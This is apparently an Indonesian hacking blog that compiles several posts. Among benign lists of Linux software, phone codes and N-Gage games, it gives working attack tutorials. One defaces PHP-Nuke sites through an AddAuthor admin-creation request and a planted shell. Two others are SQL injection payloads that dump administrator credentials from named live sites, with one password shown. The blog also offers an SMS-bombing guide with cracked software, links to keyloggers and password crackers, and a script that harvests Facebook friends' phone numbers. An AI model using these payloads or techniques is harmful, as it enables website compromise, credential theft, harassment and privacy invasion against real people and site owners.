This is default featured post 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Rabu, 30 Maret 2011

..--Deface website nuke php

1. DEFACE OLD PHP NUKE

1.Buka situs www.google.com
2.kemudian msukkan google dork kya gene |=> allinurl:.com/nuke/index.php atau allinurl:.org/nuke/index.php
3.nah klw udh ktemutargetnya lnjut ne. contoh: www.sakaw.com/nuke/index.php
4. gnti index.php dengan admin.php
5.jika sudah masukkan bug berikut ne dibelakang situs td:

?op=AddAuthor&add_aid=jundue32&add_name=
God&add_pwd=cobacoba&add_email=
bukanmaviamalam@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox

misal : www.junduegila.com/nuke/admin.php?op=AddAuthor&add_aid=jundue32&add_name=
God&add_pwd=cobacoba&add_email=
bukanmaviamalam@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox

6.kemudian akan muncul www.junduegila.com/nuke/admin.php?op=mod_author pada adress bar
7. kemudian kalian akan di suruh login, masukin id & password kalian tadi.
Masih ingat kan ?
id=jundue32 => liat yg diatas tadi
password=cobacoba => liat yg diatas tadi

Nah lu skrg udah masuk ke “Administration Menu” situs tsb.
so, kalian dah masuk ke situs tersebut.. tp klw tdk bsa berarti tu situs dah di path ma adminnya…

nah kalo sudah sampe sini saatnya merubah public halaman nya gan
masukin shell agan di preff.situs aja . ,,

selamat mencoba gan ,


ini gan hasilnya : http://www.svgolfinstructor.com/nuke/index.php

http://www.svgolfinstructor.com/nuke/admin.php

http://www.svgolfinstructor.com/nuke/admin.php?op=AddAuthor&add_aid=jundue32&add_name=
God&add_pwd=cobacoba&add_email=
bukanmaviamalam@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox


back to http://www.svgolfinstructor.com/nuke/admin.php
jangan lupa ctrl - ( berulang2 hingga ada tampilan login ) kecil emang , hehe


login
user : jundue32
pass: cobacoba

cari press situs, icon kolom 2 baris 3 .

ubah shell yang paling atas,,

selamat mencoba

Sumber

..--Joomla Component (com_ezautos) SQL Injection Vulnerability

Coba share lagi gan...

Dork : inurl:com_ezautos

[ Vulnerable File ]

index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1 [ SQL ]

[ Exploite ]

+and+0+union+select+1,2,concat(username,0x3a,password),4,5,6,7+from+%23__users+where+gid=25+or+gid=24+and+block%3C%3E1--

[ Demo]

http://xxxxx/index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1+and+0+union+select+1,2,concat(username,0x3a,password),4,5,6,7+from+%23__users+where+gid=25+or+gid=24+and+block%3C%3E1--


Sumber

..--50 aplikasi Linux terfavorit

Asslamu'alaikum.....

Linux telah menjadi fenomena baru beberapa tahun lalu, namun hingga kini masih saja ada sejumlah pengguna komputer yang enggan memakai Linux dengan berbagai kendala mereka masing-masing. Dan salah satunya adalah anggapan bahwa Linux banyak memiliki keterbatasan, terlebih pada aplikasi yang dapat digunakan di Linux. Untuk itu artikel ini akan sedikit banyak memperkenalkan sejumlah aplikasi yang dapat digunakan di Linux dan tentunya fitur-fitur yang disediakan aplikasi-aplikasi ini pun tidak kalah dengan banyak aplikasi yang telah kita kenal terlebih dahulu lewat OS Windows. mungkin ini adalah aplikasi dasar yang diperlukan buat ane.... jadi yang merasa kurang monggo di tambah....

ANIMATION SOFTWARE

Blender 3D
Blender 3D merupakan salah satu aplikasi pengolah grafis dengan kualitas 3D yang sangat tinggi. Bahkan aplikasi ini tidak jarang digunakan untuk memproduksi animasi 3D komersil. Dengan beragam fitur dan kelengkapan yang disediakan pada aplikasi ini, betapa beruntungnya kita karena aplikasi ini bisa didapat dengan gratis.

Pencil (2D)

Pencil adalah aplikasi grafis 2D yang mengolah traditional hand-drawn animations, dengan mengompilasikannya pada “page-page” yang disediakan sehingga membentuk sebuah digital flipbook.

KPovModeler

KpovModeler adalah software composition/modeling untuk sarana pembuatan POV-Ray scenes, termasuk salah satu alternative Blender 3D yang cukup menjanjikan.

Stopmotion

Merupakan aplikasi yang dapat digunakan untuk meng-capture dan atau mengkombinasikan foto secara bersamaan untuk menciptakan sebuah Stopmotion video yang cukup halus. Tidak hanya mampu menangani pembuatan claymation video dan sejenisnya, namun juga handal untuk pembuatan timelapsed video.

Synfig (2D)

Synfig adalah software animasi 2D gratis yang bisa anda coba, di package-nya tertuliskan "two-dimensional animation has long been the domain of proprietary software…Synfig, a free software/open source tool for producing feature-film quality animation with fewer people and resources." Sangat menarik.

Anime Studio 5 (2D)($199.99)

Anime Studio 5 juga diplot sebagai aplikasi pembuat animasi, walaupun aplikasi ini tidak gratis seperti yang lain, namun Anime Studio 5 menghadirkan banyak sekali fitur dan performa yang sepadan dengan harga yang harus dibayarkan untuk membawanya ke komputer anda. Dilengkapi dengan import/export OBJ files, special effects scripting, layered animation, vector animation, dan advanced timeline controls.


AUDIO SOFTWARE

Audio CD Extractor (ripper)

Aplikasi ini pertama lebih dikenal dengan nama Sound Juicer, aplikasi CD ripper yang sangat mudah penggunaannya. Aplikasi ini juga handal dan cepat dalam proses pembuatan CD musik, interfacenya yang simpel tetap membuatnya menjadi salah satu aplikasi pengolah audio terdepan.

Audacity (recorder)

Audacity adalah salah satu yang terkenal dari sekian banyak aplikasi audio gratis lainnya. Kemampuan recording dan editor audio-nya dapat men-support hampir seluruh format file audio. Beberapa fitur unggulannya adalah record multiple channels, split channels, merge audio, dan sejumlah fitur menarik lainnya.

Sound Converter

Aplikasi dari GNOME ini sangat handal dalam penanganan converter berbagai jenis file audio ke dalam bentuk mp3, wav, flac, ataupun ogg.

Last Exit (player)

Last Exit adalah aplikasi standalone player untuk Last.fm yang akan memudahkan anda untuk menambah dan mencari station secara lebih spesifik. Sejumlah fitur lain seperti set preferences, password protect, dan save changes juga disertakan pada aplikasi ini.

Hipo iPod Management Tool

taiBila perangkat iPod selalu menyerhari-hari anda, aplikasi ini akan sangat berguna. Hipo iPod Management Tool adalah aplikasi manager untuk mengatur segala sesuatu yang anda butuhkan pada iPod anda.

Utube-Ripper

Anda salah satu YouTube freak? tentu anda tak akan melewatkan aplikasi yang satu ini, dengan YouTube Ripper anda bisa men-download dan menyimpan setiap video yang ada di YouTube, bahkan aplikasi ini juga memperbolehkan anda hanya menyimpan file audio-nya saja.

Freqtweak

FreqTweak adalah aplikasi pengolah audio yang dapat me-manipulasi audio spectral dan menampilkannya. Dengan sejumlah proses pengolahan audio data pada frekuensi domain tertentu yang didukung dengan interaktif GUI, FreqTweak mampu menghasilkan high resolution spectral displays untuk file audio anda.


VIDEO SOFTWARE


VLC

Anda sering mendengar namanya? tentu saja, aplikasi ini memang cukup sering dipakai dan banyak juga yang menjadikannya aplikasi “must have”. Karena pada dasarnya VLC memang dilengkapi fitur yang cukup banyak, mensupport hampir semua format file video, dan pengaturan audio yang lengkap. Ringan dan mudah digunakan, merupakan alasan utama aplikasi ini banyak dicari.

AcidRip

AcidRip merupakan aplikasi simpel yang berfungsi untuk copying DVD ke dalam bentuk digital video file, dengan codec seperti XviD, x264, MPEG, dan masih banyak lagi tipe codec yang dapat diprosesnya. Di dalam aplikasi ini anda bisa menentukan ukuran file, setting audio, kualitasnya, cropping, dll.

Avidemux

Salah satu aplikasi editing video yang handal. Avidemux dapat digunakan untuk memberikan filter pada video, maipulasi audio dan video dengan dangat teliti, mengkombinasikan VOB, kengkombinasikan video, dan fitur-fitur editing video lainnya.

DVD::RIP

Sama halnya dengan AcidRip yang handal dalam pembuatan digital video melalui DVD, DVD::RIP juga sangat piawai menangani proses convert melalui ISO ataupun VOB file. Langkah-langkah dalam aplikasi ini pun sangat mudah dan cepat, cukup dengan me-load file, pilih setting video yang akan dihasilkan, dan DVD::RIP akan segera bekerja.

Gnome Subtitles

Edit, menambahkan, dan memanipulasi subtitle pada sebuah video adalah keahlian utama dari software gratis pengolah video ini.

iriverter

irivirter cukup simpel dan bisa digunakan untuk men-convert video dengan mudah melalui berbagai macam portable video device, seperti the Creative Vision M dan iRiver players. Single dan batch conversions dapat ditangani dengan baik.

Wink

Aplikasi pengolah video gratis yang dapat menghasilkan video screencasts, dapat anda pilih sebagai aplikasi pendamping anda saat membuat video tutorial ataupun presentasi. Beberapa fitur pelengkapnya juga sangat membantu dan fungsional.

XBMC Media Center

Pernah dengar aplikasi ini? XBMC sempat meraih beberapa peghargaan, media center dengan multiple platform. Aplikasi ini sangat tangguh di Ubuntu. Keseluruhan dari aplikasi ini sangat menarik dan berkualitas tinggi, bahkan bisa dikatakan yang terbaik untuk kualitas sebuah media player yang dapat mengorganisir dan memainkan video, musik, dan foto, termasuk menampilkan preview dan cover album.

GRAPHICS

GIMP

GIMP merupakan alternatif dari Adobe Photoshop di Linux. Menawarkan editing dan authoring image tingkat lanjut. GIMP juga mendukung pembuatan animasi dengan berbagai jenis tool, plugins, filter, dan brush. Hampir semua yang bisa dilakukan oleh Photoshop dapat juga dilakukan oleh GIMP, walaupun pada awalnya kita harus berkenalan dahulu dengan tiap-tiap tool dan fitur yang ada di aplikasi ini.

Hugin

Hugin adalah aplikasi panorama maker yang cara kerjanya yaitu mengkombinasikan dua atau lebih foto dan menjadikannya sebuah panorama. Aplikasi ini akan sedemikian rupa memadukan warna untuk menyamarkan perbedaan antara kedua foto agar menjadi sebuah panorama yang bagus. Hugin juga menyediakan sejumlah fitur yang cukup berguna lainnya.

Comix

Comix merupakan salah satu aplikasi untuk penggemar komik digital. Dengan kualitas yang sangat baik, dan didukung berbagai fitur yang sangat berguna seperti double-page support, zoom, rotation, mirroring, fullscreen mode, fit-to-screen mode, image enhancement, image quality toggle, dan bookmarks, Comix layak dan harus anda miliki.

FlickrUploader

FlickUploader akan memudahkan anda untuk meng-upload images secara instant ke account flickr anda.

Inkscape

Inkscape merupakan aplikasi yang sangat menarik dan patut dicoba, kegunaannya tidak jauh berbeda dengan Adobe Illustrator

sample:


Phatch Photo Batch Processor

Aplikasi ini sangat membantu anda dalam editing foto dengan cepat dan mudah, dengan aplikasi ini anda bisa melakukan resize, crop, rotate, add rounded corners, change perspective, dan berbagai kegunaan lain yang begitu praktis.

QCaD

QCaD layaknya autoCAD yang dapat ditemui di Ubuntu. Menawarkan banyak kemudahan seperti dapat men-support file dari autoCAD, maupun file sejenis lainnya.


OFFICE
xPDF

xPDF adalah salah satu dari PDF tool yang ada, aplikasi yang ringan dan dapat men-support standard, Truetype, dan Type 1 fonts. xPDF juga dilengkapi dengan converting PDF ke format lain yang berbeda, terdapat juga fitur multiple languages.

AbiWord

Untuk yang satu ini tentu sudah tidak asing lagi, aplikasi ringan dan mudah sekali penggunaannya, bekerja sangat baik di Linux. handal dalam pemrosesan document.

OpenOffice Writer

Aplikasi word processing kali ini pastinya sudah pernah anda coba, aplikasi word processing high-end yang mempunyai segudang fitur dan layanan yang kita butuhkan dalam pemrosesan document. Jika anda ingin mencari pengganti MS Office, OpenOffice adalah alternatif terbaik.

OpenOffice Spreadsheet

Fungsi dan kegunaannya serupa dengan MS Excel.

OpenOffice Presentation

Fungsi dan kegunaannya serupa dengan MS PowerPoint.

OpenOffice Impress

Fungsi dan kegunaannya serupa dengan MS Publisher.

KAddressBook

Kaddress merupakan aplikasi personal contacts / address manager yang cukup berguna.

KOrganizer

Aplikasi ini dapat membantu anda mengorganisir kegiatan sehari-hari anda, dengan fungsi kalender dan pengaturan jadwal, Korganizer juga menyediakan fitur track important dates, dan add notes.

GnuCash

GnuCash sangat berguna untuk me-manajemen keuangan, baik secara personal maupun badan usaha (bisnis). Aplikasi ini menawarkan beragam fitur seperti dapat men-support banyak tipe file semisal Quickbook files, GnuCash juga menawarkan multiple accounts, dan secara konstan mengkalkulasi balance, hampir semua yang dibutuhkan dalam me-manage keuangan anda ada disini.

xCHM

Sesuai namanya, xCHM berfungsi sebagai CHM HTML viewer, cocok untuk membaca HTML ebook berkapasitas besar dan sejumlah file yang di-save dalam format CHM.

sample:


UTILITIES

GPSDrive

Siystem navigasi yang didesain untuk bekerja dengan GPS receiver.Dilengkapi juga dengan fasilitas zoom dan display map downloaded melalui OpenStreetMap. Tentunya terpercaya dan bisa diandalkan.

Gnome Partition Editor

Partition Editor akan memudahkan anda untuk memanipulasi partisi yang dapat juga men-support multiple file structures.

Virtual Box OSE

Virtual Box merupakan aplikasi virtual machine, yang sangat membantu untuk menjalankan OS lain di Linux.

sample:


ClamAV

Seperti kita tau ClamAV adalah anti virus yang cukup tangguh dan bekerja sangat baik di Linux.

sample:


Gmount-ISO

Anda pernah mendengar aplikasi Daemon? jika pernah, aplikasi satu ini tiadk jauh berbeda dengan Daemon. Tugasnya adalah mengaplikasikan file ISO baik DVD maupun CD sehingga dapat terbaca di sistem.

INTERNET


Opera

Opera, aplikasi browser ringan yang mendukung interface launch page dan sejumlah fitur unggulan lainnya.

sample:


Mozilla Firefox

Tidak mungkin anda tidak tau dengan aplikasi browser yang satu ini, dari sekian banyak aplikasi browser dari Linux, inilah aplikasi yang paling terkenal hingga kini. Stabil dan didukung banyak plugin.

sample:


Thunderbird

Thunderbird adalah aplikasi email client dari Mozilla. Menawarkan fitur-fitur seperti multiple account access, IMAP dan SMTP, password protection, address books, dan masih banyak lagi.

SeaMonkey

SeaMonkey secara garis besar berbasis pada Firefox, hanya saja SeaMonkey terasa lebih stabil.

Evolution

Evolution merupakan aplikasi email client yang bisa ditemui di Linux, hampir terlihat sama persis seperti Microsoft’s Outlook.

Pidgin IM

Aplikasi messaging instant yang dapat men-support ICQ, Yahoo! IRC, Zephyr, Gadu, Groupwise, SIMPLE, SILC, Sametime, Napster, MSN, dan Jabber.

sample:


gFTP

gFTP adalah aplikasi file transfer protocol pada Linux yang menawarkan berbagai fasilitas upload dan download.

sample:



sekian terima kasih semoga bermanfaat untuk semua

..--BUaT lampU dI kEWorD diSco

buAT LAMPU disko di keyboard

yg udah tau diem aja, buat yg blum tau aja ya

bUka NoTePAd
Copy pASTe SCRiPT DiBAwaH InI :

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop



SaVe dengAN NaMA DisKO.vbS (ingEt depaN NYA haRuS tiTiK(.)VBS =tEGaR.VBS


GARa" iNI dEh TUliSAn Ku BESAr kecIL


jagan lupa thanks nya ya mas kalo berhasil

** SMS BOmBER WITH PULSA **




Pernah dapat sms :
" selamat Anda memenangkan Grand Prize Kijang Innova dari Gebyar Semarak kemerdekaan RI. Untuk informasi & pengambilan hadiah hubungi CS >>>> di +628xxxxxx" dll....

Bosan dengan pesan penipuan & pengen juga ngerjain yang telp dengan membomnya pake sms via hape Anda...

atau kamu pernah di ancam melalui sms
itu yang pernah saya alami dan salah seorang teman wanita saya


Sekilas info :

1. Ngebom nomor melalui sms (short massage service) tertentu via ponsel & PC.

2. Support semua ponsel yang bisa didetect oleh komputer (program otomatis mengenali setiap ponsel yang telah dikenali PC).

3. Biaya sms dibebankan kepada pulsa Anda (atau kalo punya banyak sms free bisa juga digunakan). Program hanya mengatur jadwal & jumlah pengiriman saja. Pengiriman tetap menggunakan jaringan GSM/CDMA Anda.

4. Bisa mengirim 100, 1.000, 10.000 sms sekaligus atau bisa diatur (schedule) interval tiap 5 menit, harian, mingguan, bulanan & tahunan (syarat : PC tetep konect dengan ponsel. Pulsa juga akan berkurang menurut tarif standar.

5. Disarankan menggunakan kabel data. (belum nyoba pake Bloetuth atau infra merah. (disarankan juga tes koneksi menggunakan koneksi via PC suite masing2 merk ponsel (PC suite Nokia, SE, dll)

6. Tidak perlu koneksi internet


Program : SMSCaster E-marketer (standar / Enterprise Ed / CDMA) + keygen...

Step by step :

1. Hubungkan ponsel dengan PC (pastikan bahwa ponsel telah bisa dikenali komputer (via program PC suite masing2 PC)

2. Install seperti biasa...

3. Setelah install pilihan automatic scan buat ngecek & mengenali hape ANda...
Liat gambar setelah phone dikenali (gue pake 5500):
Gambar satu

4. Cara menggunakan keygen :

Pilih Help > abaout. Copy serial # yang ada disitu ke keygens (ada dalam .rarnya), pilih " SMSCaster E-marketer Enterprise Ed " & klik "generate". Copy hasil generate. Di "About" tadi klik "unblock" dan pastekan serial dari keygens dan klik OK. Full version deh programnya...
gambar satu "a"


Cara Menggunakan :.

1. Buka program.

2. Klik "compose" buat ngirim sms baru.
- To number : nomor yang akan kita boom (memang manual ya :D)
- To contacs : kosongkan
- To contacs : kosongkan
Ketik deh pesannya di kolom bawahnya yang lebar banget tuh (ingat 1 sms = 160 karakter ya---ada kok toolbarnya pemberitahuannnya)...

3. Klik tulisan " send to Outbox" sebanyak yang akan kita kirimin (langsung klik terus tulisan " send to Outbox") 100, 1.000, 10.000 juga bisa :D
Gambar 2

4.Kalau sudah no. 3, sekarang klik di "outbox",[angka dalam kurung jumlah yang ada dalam outbox alias yang akan kita kirim), nah sekarang keliatan khan list yang akan kirim sms nya. Tinggal pencet "START" atau "send"....
Terkirim tuh....
Gambar 3

5. Untuk ngecek berapa yang udah terkirim, tinggal klik tombol "sent " (angka dalam kurung jumlah yang udah terkirim).

Gambar 4

Tambahan : tombol "schedules" buat memprogram sms dikirim sesuai waktu yang kita tentukan. Buat dulu schedulenya, baru buat sms baru di "compose", kirim ke "sent to outbox" dan di "outbox" pencet "sent" atau "start".


Program Download Disini :

SMSCaster E-marketer Enterprise Ed + keygens :

cat : kelemahan dr Software ini adalah tidak bs Meng-hidden No Hp ^^...


Selamat Ngebooom yak

Download

Download

[poc] SQLI menggunakan handphone.

mungkin ini aga terasa aneh, bahkan terasa asing untuk didengar.

Oke deh, lanjut....

Sebenernya, sqli menggunakan handphone ga ada bedanya ama sqli dengan menggunakan kompi.

yg menarik dari SQLI via handphone adalah tentang pesan error setelah melakukan pengujian terhadap situs target. Dimana, dengan menggunakan handphone biasanya pesan error tersebut akan terlihat lebih jelas dari pada menggunakan kompi...

O iya, ane lupa........ syarat untuk melakukan sqli menggunakan handphone, kita Harus punya handphone yang mendukung aplikasi opera mini 4.2

Poc nya

Code:
inurl:showcats.php?sbcat_id=
pada poc kali ini ane akan menggunakan dork yang diatas..

inget, smua dork google dgn handphone harus di awali dengan huruf kecil..

lanjut
Code:
http://www.top-domains.com/showcats.php?sbcat_id=1

http://www.top-domains.com/showcats.php?sbcat_id=1'

http://www.top-domains.com/showcats.php?sbcat_id=-1+order+by+5--

http://www.top-domains.com/showcats.php?sbcat_id=-1+union+select+1,2,3,4--

http://www.top-domains.com/showcats.php?sbcat_id=-1+union+select+1,version(),3,4--

http://www.top-domains.com/showcats.php?sbcat_id=-1+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--

http://www.top-domains.com/showcats.php?sbcat_id=-1+union+select+1,group_concat(username,0x3a,password),3,4+from+sblnk_admin--
username: admin
password: apa4773apa

maap, klo ane ga bisa ngejelesin prosesnya secara detail, karna mungkin masalah sqli smuanya udah pada tau...

O iya, hmmm....
Situs target di atas klo bisa jangan diganggu dulu yah....
Biar temen temen kita yang lainya yang masih blom tau masalah sqLI juga bisa belajar...


hmmm, klo tulisan ane aga brantakan mohon di maklumi, secara ane ngepostnya pake handphone.. :

Aneka Software Hacking

Sebenarnya ada banyak sekali software hacking yang saya punya. Tapi sebagian besar filenya berukuran besar. Jadi uploadnya sedikit demi sedikit saja. Ini ada beberapa yang mungkin bisa berguna bagi yang suka nyoba hacking-hackingan. Lain kali kalau koneksinya lebih baik, akan saya saya upload lagi. Hari ini koneksi internet sedang buruk sekali dan sangat lambat. Jadinya hanya bisa upload sedikit. Harap maklum....
Bagi teman-teman yang punya software dan mau berbagi link download silakan posting saja url Anda di bagian komentar.
Silakan download software-software hacking berikut ini:

Paket Software Hacking
Paket Software Hacking 2
Paket Software Hacking 3
Paket Software Keylogger
Tools IP address
Paket Software Hacking 4
Pembobol Password 1
Pembobol Password 2
Paket Software Hacking 5
Paket Software Hacking 6

Selamat mendownload...Lain kali saya berikan software-software yang lainnya.

Cara Cepat Mengetahui No HP Teman Di Facebook

Facebook

Untuk mencari No Handphone teman-teman kita di Facebooksatu persatu mungkin bukan pekerjaan yang mudah apalagi sudah punya banyak teman, berapa banyak waktu yang harus kita habiskan. Repot dan malas bukan?,jika harus membuka satu satu FB teman kita.
Ternyata mengoleksi no HP merupakan salah satu hoby dari para Facebooker, heee Apalagi no HP cewek buat para cowok dan begitu juga sebaliknya.
Nah dari pada mesti nyari atu-atu, neh ada tips nya Cara cepat mencari nomor secepat kilat...wuzzzzz beberapa kali klik sudah dapat banyak no.
Ikuti langkah-lagkah dibawah ini

  • Kebiasaan setiap Tutorial maka Pertama kali Mesti Login dulu Pake Account Masing-masing, Jangan coba-coba pinjem Account teman bisa kena jitak...
  • Selanjutnya...Silahka menuju link berikut http://www.facebook.com
Gimana?... Seeppppp bukan ?
Jangan Tanya : "Gimana dunk yang ga Pasang No HP di FB bisa Ketahuan ga Number nya?"

Masalah Selanjutnya yang akan Sobat temui yakni, Bagaimana cara Mencopy dengan cepat atau menyimpannya pada Kompi sobat, Mungkin sobat akan menyalinnya satu persatu ataukah akan di Sort lalu di Copy dan di Pastekan ke Notepad atau word?
Ya Ampun jika disalin satu persatu...? tahu deh akibatnya " Jari akan kriting "
Lalu Copy langsung dan di Patekan...? wahhh Photo teman akan ikut juga ...

Tenang-tenang ini dia cara Cepat dan Praktis Copy Paste semua No Teman..meski repotnya cuma sekali
Cara Cepat Copy [ export ] No Hape Teman di Facebook

Langkah Pertama
Sebelum menambahkan Script Export Phonebook Facebook , Anda harus terlebih dahulu menambahkanGreasemonkey . The Greasemonkey add-on akan membiarkan Anda menginstal kode Export Phonebook. Dapatkan Greasemonkey add-on, pastikan Bila sudah di Install Ada Gambar monyet di bagian kanan bawah layar.
BILA SUDAH Install Silahkan Lewati Langkah ini Langsung saja Kelangkah Kedua
Silahkan Install Greasemonkey dengan klik link dibawah ini :
Klik Disini Pengguna Firefox 
Klik Add to Firefox
Setelah Selesai maka Restar Firefox anda

Eittt Pengguna IE Jangan Kecewa...
Klik diusini Untuk Pengguna IE
Klik Download Free

Setelah selesai Restar IE Anda

Langkah Kedua
Silahkan Menuju Tombol Berikut Untuk Install Kodenya 
Export Phonebook 
Setelah menuju halaman Install Maka Klik lagi Install Tunggulah beberapa saat hingga Proses install selesai.


Silahkan Menuju Account Facebook 
Lalu Klik Kanan Gambar Monyet lalu jalankan (centang Jadi enable), jika sudah maka dibiarkan saja, Arahkan Mouse ke User Script Commands dan klik Grap Phone number seperti gambar berikut

Maka Hasilnya Seperti ini



Untuk Mengembalikan Lagi seperti Biasa Silahkan Menuju Menu Firefox Atau IE Lalu Klik Tools CariGreasemonkey Hapus Centang nya Jadi Disable.
sumber : http://www.kumpulancara.com/2010/08/cara-cepat-mengetahui-no-hp-teman-di.html

Kode Rahasia Handphone Nokia, dll

Kode akses Nokia

*#30# : Menampilkan ‘private number’ yang menghubungi anda.
*#73# : Mereset timer ponsel dan skor game (pada beberapa ponsel).
*#7780# : Mengembalikan ke setting pabrik (factory setting).
*#2820# : Alamat IP perangkat Bluetooth (untuk ponsel yang mempunyai Bluetooth).
xx# : Akses cepat ke nama/nomer telepon di phone book ponsel, misalnya 20#.
Tombol off : Menekan dengan singkat, untuk berpindah antar profile.
*3370# : Mengaktifkan EFR(Enhanced Full Rate) Codec (tidak berlaku di ponsel Symbian).
#3370# : Menonaktifkan EFR Codec.
*#4270# : Mengaktifkan Half Rate Codec.
*#4270# : Menonaktifkan Half Rate Codec.
*#0000# : Menampilkan versi software ponsel.
*#9999# : Kode alternatif jika *#0000# tidak bekerja.
*#06# : Melihat nomor IMEI (Internasional Mobile Equipment Identity).
*#21# : Mengecek nomor pengalihan “All Call” yang digunakan.
*#2640# : Menampilkan kode keamanan ponsel yang digunakan.
*#43# : Mengecek status “Call Waiting”.
*#61# : Untuk mengecek nomor pemanggil yang dialihkan ketika tak anda jawab.
*#62# : Mengecek nomor pemanggil yang dialihkan ketika ponsel anda di luar jangkauan.
*#67# : Mengecek nomor pemanggil yang dialihkan ketika ponsel anda sedang sibuk.
**21*number# : Menghidupkan pengalihan “All Call” pada nomor yang diisi.
**61*number# : Menghidupkan pengalihan “No Reply” pada nomor yang diisi.
**67*number# : Menghidupkan pengalihan “On Bussy” pada nomor yang diisi.
*#67705646# : Mengganti logo operator logo pada Nokia 3310 dan 3330.
*#746025625# : Menampilkan status SIM Clock.
*#7760# : Menampilkan kode pabrikan (sebagian besar ponsel tipe lama).
*#92702689# : Memunculkan : 1. Serial Number, 2. Date Made, 3. Purchase Date, 4. Date of last repair, 5.Transfer user data. Keluar dari mode ini harus merestart ponsel ( pada beberapa ponsel ).


Kode akses Sony Ericsson


*#06# : Melihat nomor IMEI (Internasional Mobile Equipment Identity).
*#0000# : Mereset bahasa kembali ke English.
> * < < * < * : Service Menu - menampilkan versi software ponsel. Tekan “Yes” berulang-ulang untuk melihat semua data software dan tekan “>” untuk melihat semua teks yang terdapat pada ponsel.
< * * < : Mengunci SIM Card.

Sortcuts :

1. Menyimpan nomor “Missed Call” di direktori ponsel.
Cari menu “Missed Call”, tekan “Yes” untuk menampilkan nomor yang dituju. Tekan nomor apa saja ( 0 sampai 9 ), kemudian tekan “clear” sekali untuk memblok nomor tersebut, kemudian tekan dan tahan “<” sampai muncul “Store”, tekan “Yes”.

2. Menyembunyikan nomor.
Setelah menekan nomor yang dituju dan sebelum menekan “Yes”, tekan ‘ > ‘ 2 kali untuk memilih “Hide Id?” dan tekan ‘Yes’.

3. Mengecek level batere ketika ponsel mati (off ).
Tekan ‘No’ secara cepat 1 x dan tunggu hingga tampilan baterai terlihat.

4. Menyimpan nomor di memori ponsel (bukan SIM Card).
Ikuti prosedur normal untuk menyimpan nomor. Ketika tampilan untuk menyimpan terlihat tekan ‘#’ sekali dan lokasi yang diinginkan, atau tekan ‘#’ 2 kali untuk melihat posisi lanjutan.

5. Menghubungi nomor dari pesan SMS.
Mengarahkan kursor pada nomor yang tertulis, kemudian tekan “Yes”.



Shortcut Penampilan Gambar :



(Berlaku di sebagian besar ponsel Symbian).
Ketika melihat image atau gambar di galeri, tekan :
1 : untuk memutar gambar ke kiri.
2 : untuk memutar gambar ke kanan.
5 atau 7 : untuk memperbesar (zoom) gambar.
* : untuk tampilan fullscreen atau non fullscreen.
Catatan : perintah angka di atas bisa berbeda di setiap ponsel.

Hard Reset :


Peringatan !!! Semua data ponsel akan hilang.
Dalam keadaan ponsel mati (off), tekan secara bersamaan tombol telepon (bicara), angka 3, dan tombol * (bintang). Kemudian dalam keadaan menekan ketiga tombol tersebut, tekan tombol On. Trik ini berlaku di sebagian besar ponsel Nokia.



Update Tambahan Nokia GSM


Nokia 21xx
Kode Penjelasan
*#06# Kode IMEI
*#3283# Minggu Produksi/Bulan & Tahun
*#9999# Versi Software

Nokia 32xx
Kode Penjelasan
*#06# Kode IMEI
*#0000# Versi Software
*#92702689# Menu Layanan
*#746025625# Sim Clock Stop
*3370# EFR aktif, suara lebih jernih, baterai cepat habis.
#3370# EFR inactive.
*4720# HR aktif, suara tidak lebih jernih, baterai tahan lama.
#4720# HR OFF.

Nokia 51xx
Kode Penjelasan
*#06# Kode IMEI
*#0000# Versi Software
*#92702689# Menu layanan
*3370# EFR aktif, suara lebih jernih, baterai cepat habis.
#3370# EFR inactive.
*4720# HR aktif, suara tidak lebih jernih, baterai tahan lama.
#4720# HR OFF.

Nokia 61xx
Kode Penjelasan
*#06# Kode IMEI
*#0000# Versi Software
*#92702689# Menu layanan
*3370# EFR aktif, suara lebih jernih, baterai cepat habis.
#3370# EFR inactive.

Nokia 81xx
Kode Penjelasan
*#06# Kode IMEI
*#8110# Versi Software, tanggal produksi & nomor model
*#92702689# Menu layanan

Nokia 88xx
Kode Penjelasan
*#06# Kode IMEI
*#0000# Versi Software
*#92702689# Menu Layanan
*3370# EFR aktif, suara lebih jernih, baterai cepat habis.
#3370# EFR inactive.

Nokia 90xx
Kode Penjelasan
*#06# Kode IMEI
*#6823711
58412125# Versi Software
*#3283# Tanggal Produksi

N-Gage GameS




Collection of the best games for smartphone Nokia N-Gage. In the archives unpacked games, and in the format of * blz. for the installation * blz its necessary program to install games (already in the complete set)

Games Include:


1)Alien Front
2)Ashen
3)Asphalt UGT
4)Asphalt.Urban.GT.2
5)Atari Master Pieces Vol.1
6)Atlantis Redux
7)Backbone Entertainment Rifts
8)Barakel
9)Bomberman
10)Call of Duty
11)Capcom Catan
12)Civilization
13)ColinMcRae2005
14)Crash Nitro Kart
15)Fifa 2004
16)Fifa 2005
17)Fifa 2006
18)Flo Snowboarding
19)Ghost Recon
20)Glimmerati
21)High Seize
22)HinterWars
23)InterstellarFlames
24)King of Fighters
25)Marcel Desailly Pro Soccer
26)Mile High Pinball
27)Mlb Slam
28)Monkey Ball
29)Moto GP
30)Motocross Free Style
31)NCAA Football 2004
32)One
33)Operation Shadow
34)Pandemonium
35)Pathway To Glory
36)Pocket Kingdom
37)Puyo Pop
38)Puzzle Bobble VS
39)Rayman 3
40)Red Faction
41)Requiem Of Hell
42)Rifts - Promise of Power
43)Sango Fighters
44)Sega Rally
45)Snakes
46)SonicN
47)Spiderman2
48)Splinter Cell - Chaos Theory
49)Splinter Cell - Team Stealth Action
50)SSX Out Of Bounds
51)System Rush
52)Tantalus Payload
